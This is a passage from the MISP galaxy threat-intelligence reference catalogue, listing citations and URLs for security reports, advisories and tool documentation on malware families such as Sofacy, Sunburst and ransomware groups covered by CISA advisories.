The tag is: misp-galaxy:references="GitHub Sliver Ifconfig"

Table 15427. Table References

Links

https://github.com/BishopFox/sliver/blob/ea329226636ab8e470086a17f13aa8d330baad22/client/command/network/ifconfig.go

GitHub Sliver Netstat

BishopFox. (n.d.). Sliver Netstat. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver Netstat"

Table 15428. Table References

Links

https://github.com/BishopFox/sliver/tree/58a56a077f0813bb312f9fa4df7453b510c3a73b/implant/sliver/netstat

GitHub Sliver Screen

BishopFox. (n.d.). Sliver Screenshot. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver Screen"

Table 15429. Table References

Links

https://github.com/BishopFox/sliver/blob/master/implant/sliver/screen/screenshot_windows.go

GitHub Sliver Encryption

BishopFox. (n.d.). Sliver Transport Encryption. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver Encryption"

Table 15430. Table References

Links

https://github.com/BishopFox/sliver/wiki/Transport-Encryption

GitHub Sliver Upload

BishopFox. (n.d.). Sliver Upload. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver Upload"

Table 15431. Table References

Links

https://github.com/BishopFox/sliver/blob/ea329226636ab8e470086a17f13aa8d330baad22/client/command/filesystem/upload.go

Zdnet Ngrok September 2018

Cimpanu, C. (2018, September 13). Sly malware author hides cryptomining botnet behind ever-shifting proxy service. Retrieved September 15, 2020.

The tag is: misp-galaxy:references="Zdnet Ngrok September 2018"

Table 15432. Table References

Links

https://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-proxy-service/

NCSC GCHQ Small Sieve Jan 2022

NCSC GCHQ. (2022, January 27). Small Sieve Malware Analysis Report. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="NCSC GCHQ Small Sieve Jan 2022"

Table 15433. Table References

Links

https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf

SmartMontools

smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018.

The tag is: misp-galaxy:references="SmartMontools"

Table 15434. Table References

Links

https://www.smartmontools.org/

CME Github September 2018

byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020.

The tag is: misp-galaxy:references="CME Github September 2018"

Table 15435. Table References

Links

https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference

US-CERT SMB Security

US-CERT. (2017, March 16). SMB Security Best Practices. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="US-CERT SMB Security"

Table 15436. Table References

Links

https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices

SMLoginItemSetEnabled Schroeder 2013

Tim Schroeder. (2013, April 21). SMLoginItemSetEnabled Demystified. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="SMLoginItemSetEnabled Schroeder 2013"

Table 15437. Table References

Links

https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/

Malwarebytes SmokeLoader 2016

Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018.

The tag is: misp-galaxy:references="Malwarebytes SmokeLoader 2016"

Table 15438. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/

Talos Smoke Loader July 2018

Baker, B., Unterbrink H. (2018, July 03). Smoking Guns - Smoke Loader learned new tricks. Retrieved July 5, 2018.

The tag is: misp-galaxy:references="Talos Smoke Loader July 2018"

Table 15439. Table References

Links

https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html#more

FireEye SMOKEDHAM June 2021

FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="FireEye SMOKEDHAM June 2021"

Table 15440. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

Environmental Keyed HTA

Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019.

The tag is: misp-galaxy:references="Environmental Keyed HTA"

Table 15441. Table References

Links

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/

nccgroup Smuggling HTA 2017

Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved May 20, 2021.

The tag is: misp-galaxy:references="nccgroup Smuggling HTA 2017"

Table 15442. Table References

Links

https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/

Accenture SNAKEMACKEREL Nov 2018

Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.

The tag is: misp-galaxy:references="Accenture SNAKEMACKEREL Nov 2018"

Table 15443. Table References

Links

https://www.accenture.com/t20181129T203820Zw/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50

Sophos Snatch Ransomware 2019

Sophos. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved June 23, 2021.

The tag is: misp-galaxy:references="Sophos Snatch Ransomware 2019"

Table 15444. Table References

Links

https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/

AdSecurity SID History Sept 2015

Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence #14: SID History. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="AdSecurity SID History Sept 2015"

Table 15445. Table References

Links

https://adsecurity.org/?p=1772

ADSecurity GPO Persistence 2016

Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="ADSecurity GPO Persistence 2016"

Table 15446. Table References

Links

https://adsecurity.org/?p=2716

Telefonica Snip3 December 2021

Jornet, A. (2021, December 23). Snip3, an investigation into malware. Retrieved September 19, 2023.

The tag is: misp-galaxy:references="Telefonica Snip3 December 2021"

Table 15447. Table References

Links

https://telefonicatech.com/blog/snip3-investigacion-malware

Security Joes Sockbot March 09 2022

Felipe Duarte, Ido Naor. (2022, March 9). Sockbot in GoLand. Retrieved September 22, 2023.

The tag is: misp-galaxy:references="Security Joes Sockbot March 09 2022"

Table 15448. Table References

Links

https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf

Kaspersky Sodin July 2019

Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Kaspersky Sodin July 2019"

Table 15449. Table References

Links

https://securelist.com/sodin-ransomware/91473/

Kaspersky Sofacy

Kaspersky Lab’s Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.

The tag is: misp-galaxy:references="Kaspersky Sofacy"

Table 15450. Table References

Links

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

Unit 42 Sofacy Feb 2018

Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.

The tag is: misp-galaxy:references="Unit 42 Sofacy Feb 2018"

Table 15451. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/

Unit 42 Sofacy Nov 2018

Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Unit 42 Sofacy Nov 2018"

Table 15452. Table References

Links

https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

Unit42 Cannon Nov 2018

Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.

The tag is: misp-galaxy:references="Unit42 Cannon Nov 2018"

Table 15453. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

Palo Alto Sofacy 06-2018

Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.

The tag is: misp-galaxy:references="Palo Alto Sofacy 06-2018"

Table 15454. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

F-Secure Sofacy 2015

F-Secure. (2015, September 8). Sofacy Recycles Carberp and Metasploit Code. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="F-Secure Sofacy 2015"

Table 15455. Table References

Links

https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/

Sofacy Komplex Trojan

Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy’s 'Komplex' OS X Trojan. Retrieved July 8, 2017.

The tag is: misp-galaxy:references="Sofacy Komplex Trojan"

Table 15456. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

Sofacy DealersChoice

Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.

The tag is: misp-galaxy:references="Sofacy DealersChoice"

Table 15457. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/

Unit 42 SolarStorm December 2020

Unit 42. (2020, December 23). SolarStorm Supply Chain Attack Timeline. Retrieved March 24, 2023.

The tag is: misp-galaxy:references="Unit 42 SolarStorm December 2020"

Table 15458. Table References

Links

https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/

Symantec Sunburst Sending Data January 2021

Symantec Threat Hunter Team. (2021, January 22). SolarWinds: How Sunburst Sends Data Back to the Attackers. Retrieved January 22, 2021.

The tag is: misp-galaxy:references="Symantec Sunburst Sending Data January 2021"

Table 15459. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data

Carnegie Mellon University Supernova Dec 2020

Carnegie Mellon University. (2020, December 26). SolarWinds Orion API authentication bypass allows remote command execution. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Carnegie Mellon University Supernova Dec 2020"

Table 15460. Table References

Links

https://www.kb.cert.org/vuls/id/843464

SolarWinds Advisory Dec 2020

SolarWinds. (2020, December 24). SolarWinds Security Advisory. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="SolarWinds Advisory Dec 2020"

Table 15461. Table References

Links

https://www.solarwinds.com/sa-overview/securityadvisory

solution_monitor_dhcp_scopes

Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved March 7, 2022.

The tag is: misp-galaxy:references="solution_monitor_dhcp_scopes"

Table 15462. Table References

Links

https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/

Sophos X-Ops Tweet September 13 2023

SophosXOps. (2023, September 13). Sophos X-Ops Tweet September 13 2023. Retrieved September 22, 2023.

The tag is: misp-galaxy:references="Sophos X-Ops Tweet September 13 2023"

Table 15463. Table References

Links

https://twitter.com/SophosXOps/status/1702051374287007923

Source Manual

ss64. (n.d.). Source or Dot Operator. Retrieved May 21, 2019.

The tag is: misp-galaxy:references="Source Manual"

Table 15464. Table References

Links

https://ss64.com/bash/source.html

Symantec Sowbug Nov 2017

Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Symantec Sowbug Nov 2017"

Table 15465. Table References

Links

https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

NIST 800-63-3

Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019.

The tag is: misp-galaxy:references="NIST 800-63-3"

Table 15466. Table References

Links

https://pages.nist.gov/800-63-3/sp800-63b.html

Threatpost Hancitor

Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020.

The tag is: misp-galaxy:references="Threatpost Hancitor"

Table 15467. Table References

Links

https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/

CheckPoint SpeakUp Feb 2019

Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="CheckPoint SpeakUp Feb 2019"

Table 15468. Table References

Links

https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/

Cyfirma Kimsuky Spear Phishing

Cyfirma. (2020, December 16). Spear Phishing Attack by N. Korean Hacking Group, Kimsuky. Retrieved October 30, 2023.

The tag is: misp-galaxy:references="Cyfirma Kimsuky Spear Phishing"

Table 15469. Table References

Links

https://www.cyfirma.com/outofband/n-korean-hacking-group-kimsuky-escalates-attacks/

Palo Alto Unit 42 OutSteel SaintBot February 2022

Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022.

The tag is: misp-galaxy:references="Palo Alto Unit 42 OutSteel SaintBot February 2022"

Table 15470. Table References

Links

https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/

Zscaler Bazar September 2020

Sadique, M. and Singh, A. (2020, September 29). Spear Phishing Campaign Delivers Buer and Bazar Malware. Retrieved November 19, 2020.

The tag is: misp-galaxy:references="Zscaler Bazar September 2020"

Table 15471. Table References

Links

https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware

Reaqta MSXSL Spearphishing MAR 2018

Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="Reaqta MSXSL Spearphishing MAR 2018"

Table 15472. Table References

Links

https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/

FireEye Regsvr32 Targeting Mongolian Gov

Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.

The tag is: misp-galaxy:references="FireEye Regsvr32 Targeting Mongolian Gov"

Table 15473. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html

FireEye admin@338 March 2014

Moran, N. and Lanstein, A. (2014, March 25). Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370. Retrieved April 15, 2016.

The tag is: misp-galaxy:references="FireEye admin@338 March 2014"

Table 15474. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

Microsoft File Handlers

Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014.

The tag is: misp-galaxy:references="Microsoft File Handlers"

Table 15475. Table References

Links

http://msdn.microsoft.com/en-us/library/bb166549.aspx

GTFO split

GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.

The tag is: misp-galaxy:references="GTFO split"

Table 15476. Table References

Links

https://gtfobins.github.io/gtfobins/split/

split man page

Torbjorn Granlund, Richard M. Stallman. (2020, March). split(1) — Linux manual page. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="split man page"

Table 15477. Table References

Links

https://man7.org/linux/man-pages/man1/split.1.html

Spoofing credential dialogs

Johann Rehberger. (2021, April 18). Spoofing credential dialogs on macOS Linux and Windows. Retrieved August 19, 2021.

The tag is: misp-galaxy:references="Spoofing credential dialogs"

Table 15478. Table References

Links

https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/

Infosecinstitute RTLO Technique

Security Ninja. (2015, April 16). Spoof Using Right to Left Override (RTLO) Technique. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Infosecinstitute RTLO Technique"

Table 15479. Table References

Links

https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/

BBC-malvertising

BBC. (2011, March 29). Spotify ads hit by malware attack. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="BBC-malvertising"

Table 15480. Table References

Links

https://www.bbc.com/news/technology-12891182

NSA Spotting

National Security Agency/Central Security Service Information Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows Event Log Monitoring. Retrieved September 6, 2018.

The tag is: misp-galaxy:references="NSA Spotting"

Table 15481. Table References

Links

https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm

Villeneuve 2014

Villeneuve, N., Homan, J. (2014, July 31). Spy of the Tiger. Retrieved September 29, 2015.

The tag is: misp-galaxy:references="Villeneuve 2014"

Table 15482. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html

Sqldumper.exe - LOLBAS Project

LOLBAS. (2018, May 25). Sqldumper.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Sqldumper.exe - LOLBAS Project"

Table 15483. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/

sqlmap Introduction

Damele, B., Stampar, M. (n.d.). sqlmap. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="sqlmap Introduction"

Table 15484. Table References

Links

http://sqlmap.org/

Sqlps.exe - LOLBAS Project

LOLBAS. (2018, May 25). Sqlps.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Sqlps.exe - LOLBAS Project"

Table 15485. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/

SQLToolsPS.exe - LOLBAS Project

LOLBAS. (2018, May 25). SQLToolsPS.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="SQLToolsPS.exe - LOLBAS Project"

Table 15486. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqltoolsps/

Squirrel.exe - LOLBAS Project

LOLBAS. (2019, June 26). Squirrel.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Squirrel.exe - LOLBAS Project"

Table 15487. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/

ZScaler Squirrelwaffle Sep 2021

Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022.

The tag is: misp-galaxy:references="ZScaler Squirrelwaffle Sep 2021"

Table 15488. Table References

Links

https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike

Netskope Squirrelwaffle Oct 2021

Palazolo, G. (2021, October 7). SquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot. Retrieved August 9, 2022.

The tag is: misp-galaxy:references="Netskope Squirrelwaffle Oct 2021"

Table 15489. Table References

Links

https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot

Clockwork SSH Agent Hijacking

Beuchler, B. (2012, September 28). SSH Agent Hijacking. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Clockwork SSH Agent Hijacking"

Table 15490. Table References

Links

https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking

Symantec SSH and ssh-agent

Hatch, B. (2004, November 22). SSH and ssh-agent. Retrieved January 8, 2018.

The tag is: misp-galaxy:references="Symantec SSH and ssh-agent"

Table 15491. Table References

Links

https://www.symantec.com/connect/articles/ssh-and-ssh-agent

ssh.exe - LOLBAS Project

LOLBAS. (2021, November 8). ssh.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="ssh.exe - LOLBAS Project"

Table 15492. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ssh/

SSH Secure Shell

SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020.

The tag is: misp-galaxy:references="SSH Secure Shell"

Table 15493. Table References

Links

https://www.ssh.com/ssh

SSH Tunneling

SSH.COM. (n.d.). SSH tunnel. Retrieved March 15, 2020.

The tag is: misp-galaxy:references="SSH Tunneling"

Table 15494. Table References

Links

https://www.ssh.com/ssh/tunneling

SSLShopper Lookup

SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="SSLShopper Lookup"

Table 15495. Table References

Links

https://www.sslshopper.com/ssl-checker.html

Ubuntu SSSD Docs

Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Ubuntu SSSD Docs"

Table 15496. Table References

Links

https://ubuntu.com/server/docs/service-sssd

Stantinko Botnet

Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware campaign operating covertly since 2012. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Stantinko Botnet"

Table 15497. Table References

Links

https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/

Amazon AWS

Amazon. (n.d.). Start Building on AWS Today. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Amazon AWS"

Table 15498. Table References

Links

https://aws.amazon.com

Startup Items

Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.

The tag is: misp-galaxy:references="Startup Items"

Table 15499. Table References

Links

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html

Microsoft Safe Mode

Microsoft. (n.d.). Start your PC in safe mode in Windows 10. Retrieved June 23, 2021.

The tag is: misp-galaxy:references="Microsoft Safe Mode"

Table 15500. Table References

Links

https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234

Mandiant APT41

Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.

The tag is: misp-galaxy:references="Mandiant APT41"

Table 15501. Table References

Links

https://www.mandiant.com/resources/apt41-us-state-governments

Twitter SquiblyTwo Detection APR 2018

Desimone, J. (2018, April 18). Status Update. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="Twitter SquiblyTwo Detection APR 2018"

Table 15502. Table References

Links

https://twitter.com/dez_/status/986614411711442944

Mandiant Endpoint Evading 2019

Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.

The tag is: misp-galaxy:references="Mandiant Endpoint Evading 2019"

Table 15503. Table References

Links

https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode

AADInternals Azure AD Device Identities

Dr. Nestori Syynimaa. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="AADInternals Azure AD Device Identities"

Table 15504. Table References

Links

https://aadinternals.com/post/deviceidentity/

O365 Blog Azure AD Device IDs

Syynimaa, N. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved August 3, 2022.

The tag is: misp-galaxy:references="O365 Blog Azure AD Device IDs"

Table 15505. Table References

Links

https://o365blog.com/post/deviceidentity/

Carnal Ownage Password Filters Sept 2013

Fuller, R. (2013, September 11). Stealing passwords every time they change. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Carnal Ownage Password Filters Sept 2013"

Table 15506. Table References

Links

http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html

CSM Elderwood Sept 2012

Clayton, M. (2012, September 14). Stealing US business secrets: Experts ID two huge cyber 'gangs' in China. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="CSM Elderwood Sept 2012"

Table 15507. Table References

Links

https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China

DEFCON2016 Sticky Keys

Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to the Kingdom. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="DEFCON2016 Sticky Keys"

Table 15508. Table References

Links

https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom

The DFIR Report Stolen Images Conti

The DFIR Report. (2023, April 4). Stolen Images Campaign Ends in Conti Ransomware. Retrieved June 23, 2023.

The tag is: misp-galaxy:references="The DFIR Report Stolen Images Conti"

Table 15509. Table References

Links

https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/

Netscout Stolen Pencil Dec 2018

ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.

The tag is: misp-galaxy:references="Netscout Stolen Pencil Dec 2018"

Table 15510. Table References

Links

https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/

FireEye VBA stomp Feb 2020

Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.

The tag is: misp-galaxy:references="FireEye VBA stomp Feb 2020"

Table 15511. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html

Stopping CloudTrail from Sending Events to CloudWatch Logs

Amazon Web Services. (n.d.). Stopping CloudTrail from Sending Events to CloudWatch Logs. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Stopping CloudTrail from Sending Events to CloudWatch Logs"

Table 15512. Table References

Links

https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html

McAfee Virtual Jan 2017

Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual Machine. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="McAfee Virtual Jan 2017"

Table 15513. Table References

Links

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/

Checkpoint Dridex Jan 2021

Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.

The tag is: misp-galaxy:references="Checkpoint Dridex Jan 2021"

Table 15514. Table References

Links

https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/

U.S. CISA ALPHV Blackcat December 2023

Cybersecurity and Infrastructure Security Agency. (2023, December 19). #StopRansomware: ALPHV Blackcat. Retrieved December 19, 2023.

The tag is: misp-galaxy:references="U.S. CISA ALPHV Blackcat December 2023"

Table 15515. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a

U.S. CISA AvosLocker October 11 2023

Cybersecurity and Infrastructure Security Agency. (2023, October 11). #StopRansomware: AvosLocker Ransomware (Update). Retrieved October 20, 2023.

The tag is: misp-galaxy:references="U.S. CISA AvosLocker October 11 2023"

Table 15516. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-284a

U.S. CISA BianLian Ransomware May 2023

Cybersecurity and Infrastructure Security Agency. (2023, May 16). #StopRansomware: BianLian Ransomware Group. Retrieved May 18, 2023.

The tag is: misp-galaxy:references="U.S. CISA BianLian Ransomware May 2023"

Table 15517. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a

U.S. CISA CL0P CVE-2023-34362 Exploitation

Cybersecurity and Infrastructure Security Agency. (2023, June 7). #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability. Retrieved July 27, 2023.

The tag is: misp-galaxy:references="U.S. CISA CL0P CVE-2023-34362 Exploitation"

Table 15518. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a

U.S. CISA Daixin Team October 2022

Cybersecurity and Infrastructure Security Agency. (2022, October 26). #StopRansomware: Daixin Team. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="U.S. CISA Daixin Team October 2022"

Table 15519. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-294a

U.S. CISA LockBit 3.0 March 2023

Cybersecurity and Infrastructure Security Agency. (2023, March 16). #StopRansomware: LockBit 3.0. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="U.S. CISA LockBit 3.0 March 2023"

Table 15520. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

U.S. CISA LockBit Citrix Bleed November 21 2023

Cybersecurity and Infrastructure Security Agency. (2023, November 21). #StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability. Retrieved November 30, 2023.

The tag is: misp-galaxy:references="U.S. CISA LockBit Citrix Bleed November 21 2023"

Table 15521. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a

U.S. CISA MedusaLocker August 11 2022

Cybersecurity and Infrastructure Security Agency. (2022, August 11). #StopRansomware: MedusaLocker. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="U.S. CISA MedusaLocker August 11 2022"

Table 15522. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-181a

U.S. CISA Play Ransomware December 2023

Cybersecurity and Infrastructure Security Agency. (2023, December 18). #StopRansomware: Play Ransomware. Retrieved December 18, 2023.

The tag is: misp-galaxy:references="U.S. CISA Play Ransomware December 2023"

Table 15523. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a

U.S. CISA Rhysida Ransomware November 15 2023

Cybersecurity and Infrastructure Security Agency. (2023, November 15). #StopRansomware: Rhysida Ransomware. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="U.S. CISA Rhysida Ransomware November 15 2023"

Table 15524. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a

CISA Royal AA23-061A March 2023

CISA. (2023, March 2). #StopRansomware: Royal Ransomware. Retrieved March 31, 2023.

The tag is: misp-galaxy:references="CISA Royal AA23-061A March 2023"

Table 15525. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a

U.S. CISA Vice Society September 2022

Cybersecurity and Infrastructure Security Agency. (2022, September 8). #StopRansomware: Vice Society. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="U.S. CISA Vice Society September 2022"

Table 15526. Table References

Links

